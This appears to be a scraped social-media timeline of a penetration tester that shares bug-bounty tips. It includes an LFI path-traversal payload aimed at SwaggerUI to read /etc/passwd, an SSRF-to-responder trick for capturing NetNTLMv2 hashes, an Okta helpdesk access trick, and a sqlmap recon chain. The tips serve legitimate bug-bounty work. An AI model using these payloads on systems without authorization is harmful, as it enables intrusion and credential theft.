Penetration Tester | RED Teamer | WebApp Sec | OSINT Enthusiast | Linux Lover

Somewhere in Pakistan
Joined September 2020
LFI in #SwaggerUI #bugbountytips #bugbountytip add this payload for your LFI word list /v1/docs//..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\/etc/passwd HTTP/1.1 #NOTE its not working from browser
28
483
8
1,345
Show this thread
M Umer retweeted
Today, we launched this year's pwn.college Kernel Security module, at pwn.college/modules/kernel! Interested in getting into kernel exploitation? Want to know what we changed this year? Stay a while, and listen...
2
149
4
472
Show this thread
2
279
6
742
Docker 1-Auditing Tools -Docker Bench:checks for common best-practices around deploying Docker containers in production -Clair:Scan Docker images for security vulnerabilities(static analysis) -Dockscan:Scan Docker installations for security issues and vulnerabilities
1
43
0
104
Show this thread
M Umer retweeted
Whenever you end up on Okta login, click on "Need help signing in" just to see if there is any link to their internal wiki or helpdesk. I ended up on an IT helpdesk which had "Sign Up" enabled and got access to internal docs, passwords & what not. #bugbountytips
2
47
0
180
M Umer retweeted
Ghauri - An Advanced SQL Injection Automation Plugin-In By @SecurityFoster. 💫💫 Latest Acunetix VS Ghauri 🧐🧐 Coded By: @r0oth3x49 🎩 #Cybersecurity #automationtesting #BugBounty #bugbountytips
11
161
1
358
Seems like a Nice path :)
1) eJPT - free ($200 for cert) 2) 6 TCM Academy courses - $180 (often available for $10/each) 3) PNPT - $299 4) CRTO - $700 You can literally go from beginner to advanced red teaming with practical training for the price of one big industry cert that teaches maybe 1/4th of this
Show this thread
0
0
0
0
M Umer retweeted
If you ever find a SSRF on a Windows box, try running responder.py on your own VPS, then send the SSRF to file://<yourvps>. With a bit of luck, the server will send you some tasty Windows NetNTLMv2 hashes to crack 🤗 What are other methods do you use? #Bugbountytips
1
22
0
97
M Umer retweeted
Reminder: You're doing great! 🧡
4
20
0
177
Everypixel.com Reverse image search engine. Search across 50 leading stock images agencies. It's possible to filter only free or only paid images. @Everypixelcom #osint #AI
0
26
2
74
I did some analysis on Shodan and all the various types of web services targets run on non-standard ports. Based on that, these are all the ports we must scan in bug bounty during our recon phase. #bugbounty #bugbountytips #cybersecurity #security #infosec #informationsecurity
14
207
0
554
Show this thread
M Umer retweeted
Red Team Tip? Need random IP addresses to do something quick? fly.io has you covered.
0
5
0
23
I gotta say, knowing how to blog using Jekyll and Github pages to host it, has been amazing. For the last 8 years now I've been deploying websites this way. Flat html site. No login capabilities. No database. Fast page loads. Free hosting. No CGI. Simple is beautiful.
48
89
11
1,829
To all the bug bounty hunters out there: How would you recommend bounty hunters find their very first bug? How did you find your first paid bug? #bugbounty #bugbountytips
22
90
4
340
1st writeup..How I turned a Blind SSRF to $15k RCE. My public disclosure request has not been approved so I cannot directly name the program involved, but this was found on one of Hackerone's largest bug bounty programs! #bugbounty #bugbountytips sirleeroyjenkins.medium.com/…
23
277
9
633
⭐️⭐️⭐️ #Pro Methods To Find Sqli by 'Aswin Govind' ⭕️ Use Command Line Tools Like a Pro 1. sublist3r -d target | tee -a domains 2. cat domains | httpx | tee -a alive 3. cat alive | waybackurls | tee -a urls 4. gf sqli urls >> sqli 5. sqlmap -m sqli.txt --dbs --batch #BugBounty
6
139
2
298
Show this thread